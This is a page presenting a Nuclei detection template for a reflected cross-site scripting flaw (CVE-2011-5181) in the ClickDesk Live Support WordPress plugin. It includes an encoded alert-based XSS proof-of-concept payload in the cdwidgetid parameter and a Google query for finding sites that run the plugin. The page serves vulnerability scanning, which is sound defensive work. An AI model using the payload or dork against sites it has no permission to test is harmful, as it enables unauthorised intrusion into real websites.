ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting

ID: CVE-2011-5181

Severity: medium

Author: daffainfo

Tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk

Description

A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.

YAML Source

id: CVE-2011-5181

info:
  name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-5181
    - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-5181
    cwe-id: CWE-79
    epss-score: 0.00431
    epss-percentile: 0.74451
    cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: clickdesk
    product: "clickdesk_live_support-live_chat_plugin"
    google-query: "inurl:\"/wp-content/plugins/clickdesk-live-support-chat/\""
  tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'ClickDesk Live Support - Live Chat'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008fb15c6927c2af95eff0641ea9d342ac4da761480bd8414422c687a1dc2abefc02203209cb0e4fea83200e46728fd22d40e6c6136241fdb45ad14b90425222d71c35:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2011/CVE-2011-5181.yaml"

View on Github